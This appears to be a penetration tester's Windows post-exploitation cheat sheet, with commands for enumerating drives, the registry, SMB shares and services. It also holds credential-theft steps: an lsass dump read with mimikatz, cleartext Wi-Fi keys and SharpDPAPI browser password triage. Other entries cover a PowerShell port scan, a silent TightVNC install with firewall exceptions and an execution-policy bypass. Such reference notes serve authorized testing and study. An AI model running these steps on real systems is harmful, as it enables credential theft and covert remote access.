xct's notes
Windows

General

Check for additional drives

    get-psdrive                        # PowerShell
    show_mount                         # meterpreter
    wmic logicaldisk get name|caption  # wmic
    Seatbelt MappedDrives              # Seatbelt

List installed programs

    reg query HKEY_LOCAL_MACHINE\SOFTWARE
    reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    reg query HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

Check linux subsystem

    C:\Users\<name>\AppData\Local\Packages\CanonicalGroup...

Search writeable directories

    dir /a-r-d /s /b

Search files by name

    dir /s *foo*

Search Files by content

    findstr /s /i <needle> *.*

Search Files by owner

    dir c:\*.* /S /Q|FIND /i "owner"

Search files in meterpreter

    search -f *.<ext>

Search for alternate data streams (ads)

    dir /s /R /a
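An added example, not from the original notes: a PowerShell function that walks a directory tree and reports every stream other than the default `:$DATA`, with its size, so the `dir /R` output above can be filtered and sorted. The function name and the `-IgnoreZoneIdentifier` switch are my own; Zone.Identifier streams come from browser downloads and are usually noise.

```powershell
# Added example (not part of the original notes): enumerate alternate data
# streams under a directory. Function and parameter names are assumptions;
# needs PowerShell 3.0+ for the -Stream parameter on Get-Item.
function Get-AlternateDataStream {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        # Skip the Zone.Identifier stream that browsers attach to downloads
        [switch]$IgnoreZoneIdentifier
    )
    Get-ChildItem -Path $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # -Stream * returns every stream on the file, including :$DATA
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                Where-Object { -not ($IgnoreZoneIdentifier -and $_.Stream -eq 'Zone.Identifier') } |
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Length = $_.Length
                    }
                }
        }
}

# Usage: list non-default streams under C:\Users, then read one of them
Get-AlternateDataStream -Path C:\Users -IgnoreZoneIdentifier | Format-Table -AutoSize
# Get-Content -LiteralPath 'C:\path\to\file.txt' -Stream '<streamname>'
```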

Check named pipes in PowerShell

    [System.IO.Directory]::GetFiles("\\.\\pipe\\")

Grep file contents in PowerShell

    Select-String -Path <path> -Pattern <pattern> | out-host -paging

Enumerate SMB

    smbmap -R -H <ip>
    smbclient -L //<ip> -N
    smbclient //<ip>/<share> -U <user>
    smbget -R smb://<ip>/<share>

Grant permissions with icacls

    icacls <filename> /grant <username>:(OI)(CI)F /T

Search registry

    reg query HKLM /s | findstr /i <item>
    reg query HKCU /s | findstr /i <item>
    reg query HKLM /f <item> /t REG_SZ /s
    reg query HKCU /f <item> /t REG_SZ /s

Show saved Wi-Fi profile with key

    netsh wlan show profile <name> key=clear

PowerShell port scan

    0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<ip>",$_)) "Port $_ is open!"} 2>$null

Get User SID

    [wmi] "Win32_userAccount.Domain='client',Name='Administrator'"

Deploy TightVNC

    msiexec /i "tightvnc.msi" /quiet /norestart ADDLOCAL="Server,Viewer" VIEWER_ASSOCIATE_VNC_EXTENSION=1 SERVER_REGISTER_AS_SERVICE=1 SERVER_ADD_FIREWALL_EXCEPTION=1 VIEWER_ADD_FIREWALL_EXCEPTION=1 SERVER_ALLOW_SAS=1 SET_USEVNCAUTHENTICATION=1 VALUE_OF_USEVNCAUTHENTICATION=1 SET_PASSWORD=1 VALUE_OF_PASSWORD=PASSWORD SET_USECONTROLAUTHENTICATION=1 VALUE_OF_USECONTROLAUTHENTICATION=1 SET_CONTROLPASSWORD=1 VALUE_OF_CONTROLPASSWORD=PASSWORD

Grep Registry for Keywords

    reg query HKLM /s /f <keyword>   # try both HKLM and HKCU

Find Files by Date

    forfiles /P C:\ /S /D 10/24/2020 /C "cmd /c echo @PATH"

Bypass Execution Policy (for domain users) by changing registry as local administrator

    HKLM:\Software\Policies\Microsoft\Windows\PowerShell   # set the ExecutionPolicy value to Bypass

Useful Commands in Rpcclient

    rpcclient -U <user> <ip>
    lookupnames <name>
    lookupsids <sid>

Dumping Processes

    procdump.exe -accepteula -ma <pid>

We can also use a short custom program to avoid using procdump.
If we dump lsass, this dump can be read using mimikatz:

    sekurlsa::minidump lsass.dmp
    sekurlsa::logonpasswords

Credentials

Check for stored credentials:

    cmdkey /list

Company Files

This has led to success on numerous occasions. While not technical, make sure you look at the files that are on the system. This includes configuration backups, documents, notes, technical documentation and more.

Invoke-PrivescCheck

Great script to collect information about the host and possible EoP paths.

Seatbelt

Good host enumeration tool: https://github.com/GhostPack/Seatbelt.

    Seatbelt -group=all -full

SharpDPAPI

Get passwords from Chrome & Windows via https://github.com/GhostPack/SharpDPAPI.

    SharpDPAPI triage

Check for running services

    sc query
    sc query <service>
    sc qc <service>
    reg query HKLM\SYSTEM\CurrentControlSet\Services

SMBClient

List Shares

    smbclient -L //<ip> -U anonymous

Connect to Share

Without credentials:

    smbclient //server/sharename -U "" -N

With credentials:

    smbclient //server/sharename -U domain\user

Other

Usually you want to run the scripts/tools from the Privilege Escalation section. Other than that, these are interesting as well:
  • Screenshot
  • Keylogger